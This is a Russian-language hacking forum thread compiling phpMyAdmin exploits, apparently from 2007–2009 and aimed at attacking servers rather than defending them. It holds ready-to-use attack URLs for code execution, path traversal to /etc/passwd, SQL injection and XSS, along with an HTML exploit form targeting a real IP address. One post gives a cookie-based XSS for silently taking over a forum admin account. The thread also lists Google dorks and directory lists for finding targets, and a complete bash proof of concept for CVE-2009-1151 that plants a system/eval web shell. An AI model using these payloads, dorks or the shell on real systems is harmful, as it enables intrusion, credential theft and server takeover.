[ Обзор уязвимостей phpMyAdmin ]

Discussion in 'Веб-уязвимости' started by ettee, 7 Oct 2007.

  1. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Vulnerability


    2.2.0rc3
    http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.haxor2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
    Эксплоит дает выполнение произвольного кода.

    2.3.2
    http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
    SQL-injection

    2.5.*
    phpMyAdmin 2.5.7 Remote code injection Exploit
    Эксплоит дает выполнение произвольного кода.

    2.5.5-pl1 and prior
    http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
    Эксплоит дает чтение файла / выполнение произвольного кода.

    2.6.4-pl1
    phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit
    Эксплоит дает чтение любого фала.

    HTML-Exploit:
    HTML:
     <CENTER> 
    <A HREF="http://www.securityreason.com><IMG 
    SRC="http://securityreason.com/gfx/small_logo.png"></A><P> 
    <FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data"> 
    <input TYPE="hidden" name="usesubform[1]" value="1"> 
    <input TYPE="hidden" name="usesubform[2]" value="1"> 
    <input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p> 
    <input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"> 
    <input TYPE="submit" value="Exploit"> 
    </FORM> 

    2.7.0
    http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
    http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username=1&dbname=1&tablename=1
    SQL-injection


    2.11.2
    SQL-injection + XSS
    Code:
    12 ноября, 2007
    Программа: phpMyAdmin 2.11.2, возможно более ранние версии 
    
    Опасность: Низкая 
    
    Наличие эксплоита: Нет 
    
    Описание: 
    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
    
    1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE и браузер жертвы должен выполнять JavaScript код в теге img (например, Opera).
    
    2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE.

    other:
    http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
    http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
    http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
    http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
    http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No



    XSS (Cross-site Scripting) :

    2.6.0-pl2 and prior
    http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
    http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert(document.cookie)</script>

    prior to 2.6.2-rc1
    http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script>
    http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lang=en-iso-8859-1&convcharset=\"><h1>XSS</h1>

    2.8.0.1
    http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
    index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E

    2.9.x
    http://site.com/phpmyadmin/sql.php?db=information_schema&
    token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=[xss]


    other:
    Code:
    http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
    http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
    http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
    http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
    http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
    http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
    http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
    /phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
    /phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
    /phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]

    Full path disclosure :
    /scripts/check_lang.php
    /themes/darkblue_orange/layout.inc.php
    /index.php?lang[]=
    /index.php?target[]=
    /index.php?db[]=
    /index.php?goto[]=
    /left.php?server[]=
    /index.php?table[]=
    /server_databases.php?token=your_token&sort_by="
    /index.php?db=information_schema&token=your_token&tbl_group[]=
    /db_printview.php?db="
    /sql.php?back[]=
    libraries/string.lib.php
    libraries/storage_engines.lib.php
    libraries/sqlparser.lib.php
    libraries/sql_query_form.lib.php
    libraries/select_theme.lib.php
    libraries/select_lang.lib.php
    libraries/relation_cleanup.lib.php
    libraries/left_header.inc.php
    libraries/import.lib.php
    libraries/header_meta_style.inc.php
    libraries/grab_globals.lib.php
    libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
    libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
    libraries/display_import.lib.php
    libraries/display_export.lib.php
    libraries/display_create_table.lib.php
    libraries/display_create_database.lib.php
    libraries/db_table_exists.lib.php
    libraries/database_interface.lib.php
    libraries/common.lib.php
    libraries/check_user_privileges.lib.php
    libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
    libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
    libraries/import/sql.php
    libraries/fpdf/ufpdf.php
    libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)


    dork:
    Code:
    inurl:main.php phpMyAdmin
    inurl:main.php Welcome to phpMyAdmin
    intitle:"index of/phpmyadmin"
    phpMyAdmin "running on" inurl:"main.php"
    phpMyAdmin dumps
    "phpMyAdmin" "running on" inurl:"main.php"
    filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
    intitle:"index of /phpmyadmin" -tar
    allinurl:/tbl_properties_structure.php?
    inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
    http://www.google.com/search?hl=en&amp;lr=&amp;c2coff=1&amp;q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo
    

    Files locations
    Code:
    /phpm/
    /phpmy/
    /phpmyadmin/
    /PMA/
    /mysql/
    /admin/
    /db/
    /dbadmin/
    /web/phpMyAdmin/
    /admin/pma/
    /admin/phpmyadmin/
    /admin/mysql/
    /phpmyadmin2/
    /mysqladmin/
    /mysql-admin/
    /phpMyAdmin-2.5.6/
    /phpMyAdmin-2.5.4/
    /phpMyAdmin-2.5.1/
    /phpMyAdmin-2.2.3/
    /phpMyAdmin-2.2.6/
    /myadmin/
    /phpMyA/
    /phpmyad/
    /phpMyAdmin-2.6.0/
    /phpMyAdmin-2.6.0-pl1/
    /phpMyAdmin-2.6.3-pl1/
    /phpMyAdmin-2.6.3/
    /phpMyAdmin-2.6.3-rc1/
    /phpMyAdmin-2.6.2-rc1/
    /phpMyAdmi/
    /phpMyAdmin1/
    /phpMyAdmin2/
    /phpMyAdmin-2/
    /phpMyAdmin-2.10.0/
    /phpMyAdmin-2.3.0/
    /phpMyAdmin-2.3.1/
    /phpMyAdmin-2.3.2/
    /phpMyAdmin-2.3.3/
    /phpMyAdmin-2.3.4/
    /phpMyAdmin-2.3.5/
    /phpMyAdmin-2.3.6/
    /phpMyAdmin-2.3.7/
    /phpMyAdmin-2.3.8/
    /phpMyAdmin-2.3.9/
    /phpMyAdmin-2.4.0/
    /phpMyAdmin-2.4.1/
    /phpMyAdmin-2.4.2/
    /phpMyAdmin-2.4.3/
    /phpMyAdmin-2.4.4/
    /phpMyAdmin-2.4.5/
    /phpMyAdmin-2.4.6/
    /phpMyAdmin-2.4.7/
    /phpMyAdmin-2.4.8/
    /phpMyAdmin-2.4.9/
    /phpMyAdmin-2.5.0/
    /phpMyAdmin-2.5.1/
    /phpMyAdmin-2.5.2/
    /phpMyAdmin-2.5.3/
    /phpMyAdmin-2.5.4/
    /phpMyAdmin-2.5.5/
    /phpMyAdmin-2.5.6/
    /phpMyAdmin-2.5.7/
    /phpMyAdmin-2.5.8/
    /phpMyAdmin-2.5.9/
    /phpMyAdmin-2.6.0/
    /phpMyAdmin-2.6.1/
    /phpMyAdmin-2.6.2/
    /phpMyAdmin-2.6.3/
    /phpMyAdmin-2.6.4/
    /phpMyAdmin-2.6.5/
    /phpMyAdmin-2.6.6/
    /phpMyAdmin-2.6.7/
    /phpMyAdmin-2.6.8/
    /phpMyAdmin-2.6.9/
    /phpMyAdmin-2.7.0/
    /phpMyAdmin-2.7.1/
    /phpMyAdmin-2.7.2/
    /phpMyAdmin-2.7.3/
    /phpMyAdmin-2.7.4/
    /phpMyAdmin-2.7.5/
    /phpMyAdmin-2.7.6/
    /phpMyAdmin-2.7.7/
    /phpMyAdmin-2.7.8/
    /phpMyAdmin-2.7.9/
    /phpMyAdmin-2.8.1/
    /phpMyAdmin-2.8.2/
    /phpMyAdmin-2.8.3/
    /phpMyAdmin-2.8.4/
    /phpMyAdmin-2.8.5/
    /phpMyAdmin-2.8.6/
    /phpMyAdmin-2.8.7/
    /phpMyAdmin-2.8.8/
    /phpMyAdmin-2.8.9/
    /phpMyAdmin-2.9.1/
    /phpMyAdmin-2.9.2/
    /phpMyAdmin-3/
    /phpMyAdmin-4/
    /phpMyAds/
    /phpmyad-sys/

    phpMyAdmin security announcement
     
    _________________________
    #1 ettee, 7 Oct 2007
    Last edited by a moderator: 13 Jan 2008
    12 people like this.
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,699
    Likes Received:
    1,028
    Reputations:
    1,228
    SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5

    Пример использования:
    У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме).
    Кодес:
    PHP:
    <script>
    document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
    </script>
    ibf_ - префикс форума
    4 - админская группа
    31337 - наш id на форуме

    После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires.

    [size=-100]PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг)) [/size]
     
    _________________________
    #2 +toxa+, 7 Mar 2008
    Last edited: 7 Mar 2008
    7 people like this.
  3. Scipio

    Scipio Members of Antichat

    Joined:
    2 Nov 2006
    Messages:
    736
    Likes Received:
    544
    Reputations:
    190
    еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы:
    Code:
    http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
    Code:
    http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
    и т.д.
    register globals и magic qoutes неважны

    Code:
    http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
    register_globals on

    поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так:
    Code:
    http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
    но помоему в последних версиях по умолчанию доступ к скрипту запрещен, с помощью .htaccess
     
    _________________________
    2 people like this.
  4. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,699
    Likes Received:
    1,028
    Reputations:
    1,228
    It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.
    PHP:
    <?php
    $user
    ['id'] = $_COOKIE['uid'];
    $query "SELECT name, password FROM members where uid='" $user['id'] . "'";
    $query mysql_query($query);
    $name mysql_result($query0);
    echo 
    'Hello ' $name '!';
    ?>
    If it is a normal user, it would display a perfectly good name like "Hello Admin!".
    You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript.
    You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--".
    That will change the query, and display the user connected to the database, instead of the name of the user stored in the database.
    That will result in the following being echo'd; "Hello root@localhost".

    (c) h4cky0u
     
    _________________________
  5. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    686
    Likes Received:
    357
    Reputations:
    44
    Vulnerable:

    Code:
    Typo3 phpMyAdmin 3.2 
    Typo3 phpMyAdmin 3.0.1 
    Typo3 phpMyAdmin 3.0 
    Typo3 phpMyAdmin 0.2.2 
    Turbolinux Appliance Server 3.0 x64
    Turbolinux Appliance Server 3.0
    phpMyAdmin phpMyAdmin 2.11.9 
    phpMyAdmin phpMyAdmin 2.11.8 
    phpMyAdmin phpMyAdmin 2.11.7 
    phpMyAdmin phpMyAdmin 2.11.5 1
    phpMyAdmin phpMyAdmin 2.11.5 
    phpMyAdmin phpMyAdmin 2.11.4 
    phpMyAdmin phpMyAdmin 2.11.1 
    phpMyAdmin phpMyAdmin 2.9.1 
    phpMyAdmin phpMyAdmin 2.9.2-rc1
    phpMyAdmin phpMyAdmin 2.9.1.1
    phpMyAdmin phpMyAdmin 2.11.8.1
    phpMyAdmin phpMyAdmin 2.11.5.2
    phpMyAdmin phpMyAdmin 2.11.2.2
    phpMyAdmin phpMyAdmin 2.11.2.1
    phpMyAdmin phpMyAdmin 2.11.1.2
    phpMyAdmin phpMyAdmin 2.11.1.1
    phpMyAdmin phpMyAdmin 2.10.0.2
    phpMyAdmin phpMyAdmin 2.10.0.1
    phpMyAdmin phpMyAdmin 2.10.0.1
    
    Exploit:

    Code:
    http://www.example.com/server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]
    Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().

    Решение:

    Upgrade to phpMyAdmin 2.11.9.1 or newer.

    Not Vulnerable:

    Code:
    Typo3 phpMyAdmin 3.3 
    phpMyAdmin phpMyAdmin 2.11.9 .1
    
    www.phpmyadmin.net
     
    3 people like this.
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    241
    Likes Received:
    299
    Reputations:
    165
    бага разобрана тут
     
  7. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    31
    Likes Received:
    49
    Reputations:
    3
    Также можно добавить: бага работает с версии [ phpMyAdmin 2.9.0-beta1 => ]
     
    #7 +StArT+, 5 Oct 2008
    Last edited: 5 Oct 2008
    2 people like this.
  8. swt1

    swt1 Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    307
    Likes Received:
    78
    Reputations:
    21
    phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
    ______________________
    http://www.milw0rm.com/exploits/7382
     
  9. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    310
    Likes Received:
    588
    Reputations:
    -61
    2.10.0.2

    XSS
    Code:
    [CODE]http://[server]/main.php?reload=1&message=aa&sql_query=[B][XSS][/B]&token=[B][SID][/B]
    Code:
    http://[server]/main.php?reload=1&message=aa&sql_query=[B][XSS][/B]&token=[B][SID][/B]
    Code:
    http://[server]/server_privileges.php?token=[B][SID][/B]&username=[B][XSS]
    [/B]
    Code:
    http://[server]/server_privileges.php?token=[B][SID][/B]&username=[B][XSS][/B]
    Code:
    http://[server]/sql.php?db=information_schema&token=[B][SID][/B]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[B][XSS][/B]
    Code:
    http://[server]/sql.php?db=information_schema&token=[B][SID][/B]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[B][XSS][/B]
    Code:
    http://[server]/sql.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30[B][XSS][/B]&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
    Code:
    http://[server]/sql.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30[B][XSS][/B]&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
    Code:
    http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[B][XSS][/B]
    Code:
    http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[B][XSS][/B]
    Code:
    http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[B][XSS][/B]&unlim_num_rows=4&single_table=true
    Code:
    http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0&session_max_rows=30&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[B][XSS][/B]&unlim_num_rows=4&single_table=true
    Code:
    http://[server]/tbl_export.php?db=boutique&table=categories&token=[B][SID][/B]&pos=0[B][XSS][/B]&session_max_rows=30&
    disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
    single_table=true
    Оригинал: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html
     
    1 person likes this.
  10. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    428
    Likes Received:
    32
    Reputations:
    1
    :) Еще бы добавил:
    Работает на мускуле 4
    На 5 - не работает.
    По крайней мере у меня.
    ТОлько что протестил.) (хорошо что там где надо стоит 4))))
     
  11. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    413
    Likes Received:
    153
    Reputations:
    19
    Code:
    calendar.php?GLOBALS
    иожно узнать точную версию, если > 3.*
     
  12. omel

    omel Elder - Старейшина

    Joined:
    26 Jun 2007
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

    phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
    Code:
    #!/bin/bash
    
    # CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
    # by pagvac (gnucitizen.org), 4th June 2009.
    # special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln, 
    # and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!
    
    # PoC script successfully tested on the following targets:
    # phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
    # Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)
    
    # attack requirements:
    # 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
    # and 3.x before 3.1.3.1 according to PMASA-2009-3
    # 2) it *seems* this vuln can only be exploited against environments
    # where the administrator has chosen to install phpMyAdmin following
    # the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
    # 3) administrator must have NOT deleted the '/config/' directory
    # within the '/phpMyAdmin/' directory. this is because this directory is
    # where '/scripts/setup.php' tries to create 'config.inc.php' which is where
    # our evil PHP code is injected 8)
    
    # more info on:
    # http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
    # http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
    
    if [[ $# -ne 1 ]]
    then
    	echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
    	echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
    	exit
    fi
    
    if ! which curl >/dev/null
    then
    	echo "sorry but you need curl for this script to work!"
           	echo "on Debian/Ubuntu: sudo apt-get install curl"
           	exit
    fi
    
    
    function exploit {
    
    postdata="token=$1&action=save&configuration="\
    "a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
    "%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
    "%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
    "%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
    "%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
    
    postdata2="token=$1&action=save&configuration=a:1:"\
    "{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
    "%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
    "system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
    "if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
    "(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
    "%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
    "mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
    "%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
    "%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"
    
    	flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
    	
    	echo "[+] attempting to inject phpinfo() ..."
    	curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null
    
    	if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
    	then
    		curl -ks --url "$3/config/config.inc.php" >$flag	
    		echo "[+] success! phpinfo() injected successfully! output saved on $flag"
    		curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
    		echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
    		echo "    $3/config/config.inc.php?c=ls+-l+/"
    		echo "    $3/config/config.inc.php?p=phpinfo();"
    		echo "    please send any feedback/improvements for this script to"\
    		"unknown.pentester<AT_sign__here>gmail.com"
    	else
    		echo "[+] no luck injecting to $3/config/config.inc.php :("
    		exit
    	fi
    }
    # end of exploit function
    
    cookiejar="/tmp/$(basename $0).$RANDOM.txt"
    token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
    echo "[+] checking if phpMyAdmin exists on URL provided ..."
    
    #if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
    if grep phpMyAdmin $cookiejar &>/dev/null
    then
    	length=`echo -n $token | wc -c`
    
    	# valid form token obtained?
    	if [[ $length -eq 32 ]]
    	then
    		echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
    		# attempt exploit!
    		exploit $token $cookiejar $1
    	else
    		echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
    		exit
    	fi
    else
    	echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
    	exit
    fi
    
    # milw0rm.com [2009-06-09]
     
  13. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4

    Code:
    <?php
    /*
     * Generated configuration file
     * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
     * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
     * Date: Tue, 09 Jun 2009 14:13:34 GMT
     */
    
    /* Servers configuration */
    $i = 0;
    
    /* Server  (config:root) [1] */
    $i++;
    $cfg['Servers'][$i]['host']=[COLOR=White][b]''; if($_GET['c']){echo
    '<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
    '<pre>';eval($_GET['p']);echo '</pre>';};//'[/b][/COLOR]] = 'localhost';
    $cfg['Servers'][$i]['extension'] = 'mysqli';
    $cfg['Servers'][$i]['connect_type'] = 'tcp';
    $cfg['Servers'][$i]['compress'] = false;
    $cfg['Servers'][$i]['auth_type'] = 'config';
    $cfg['Servers'][$i]['user'] = 'root';
    
    /* End of servers configuration */
    
    ?>
    phpMyAdmin//config/config.inc.php?c=ls+-l+/
    phpMyAdmin//config/config.inc.php?p=phpinfo();

    Vulnerable software and versions:
    phpmyadmin:3.1.3
    phpmyadmin:3.1.3:rc1
    phpmyadmin:3.1.2
    phpmyadmin:3.1.2:rc1
    phpmyadmin:3.1.1
    phpmyadmin:3.1.1:rc1
    phpmyadmin:3.1.0
    phpmyadmin:2.11.9.3
    phpmyadmin:2.11.9.4
    phpmyadmin:2.11.9.2
    phpmyadmin:2.11.9.1
    phpmyadmin:2.11.9.0
    phpmyadmin:2.11.9
    phpmyadmin:2.11.8
    phpmyadmin:2.11.7.12.11.7.1
    phpmyadmin:2.11.7.0
    phpmyadmin:2.11.7
    phpmyadmin:2.11.6:rc1
    phpmyadmin:2.11.6.0
    phpmyadmin:2.11.6
    phpmyadmin:2.11.5:rc1
    phpmyadmin:2.11.5.2
    phpmyadmin:2.11.5.1
    phpmyadmin:2.11.5.0
    phpmyadmin:2.11.5
    phpmyadmin:2.11.4:rc1
    phpmyadmin:2.11.4
    phpmyadmin:2.11.3:rc1
    phpmyadmin:2.11.3.0
    phpmyadmin:2.11.3
    phpmyadmin:2.11.2.2
    phpmyadmin:2.11.2.1
    phpmyadmin:2.11.2.0
    phpmyadmin:2.11.2
    phpmyadmin:2.11.1:rc1
    phpmyadmin:2.11.1.2
    phpmyadmin:2.11.1.1
    phpmyadmin:2.11.1.0
    phpmyadmin:2.11.1
    phpmyadmin:2.11.0:rc1
    phpmyadmin:2.11.0:beta1
    phpmyadmin:2.11.0
     
    _________________________
    Octavian, icedz, Roba and 1 other person like this.
  14. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,431
    Likes Received:
    1,209
    Reputations:
    475
    По поводу full path disclosure
    В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
     
    1 person likes this.
  15. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Files locations
    Code:
    /php-my-admin/
    /phpMyAdmin-2.5.5-rc1/
    /phpMyAdmin-2.5.5-rc2/
    /phpMyAdmin-2.5.5-pl1/
    /phpMyAdmin-2.5.6-rc1/
    /phpMyAdmin-2.5.6-rc2/
    /phpMyAdmin-2.5.7-pl1/
    /phpMyAdmin-2.6.0-alpha/
    /phpMyAdmin-2.6.0-alpha2/
    /phpMyAdmin-2.6.0-beta1/
    /phpMyAdmin-2.6.0-beta2/
    /phpMyAdmin-2.6.0-rc1/
    /phpMyAdmin-2.6.0-rc2/
    /phpMyAdmin-2.6.0-rc3/
    /phpMyAdmin-2.6.0-pl2/
    /phpMyAdmin-2.6.0-pl3/
    /phpMyAdmin-2.6.1-rc1/
    /phpMyAdmin-2.6.1-rc2/
    /phpMyAdmin-2.6.1/
    /phpMyAdmin-2.6.1-pl1/
    /phpMyAdmin-2.6.1-pl2/
    /phpMyAdmin-2.6.1-pl3/
    /phpMyAdmin-2.6.2-beta1/
    /phpMyAdmin-2.6.2-pl1/
    /phpMyAdmin-2.6.4-rc1/
    /phpMyAdmin-2.6.4-pl1/
    /phpMyAdmin-2.6.4-pl2/
    /phpMyAdmin-2.6.4-pl3/
    /phpMyAdmin-2.6.4-pl4/
    /phpMyAdmin-2.7.0-beta1/
    /phpMyAdmin-2.7.0-rc1/
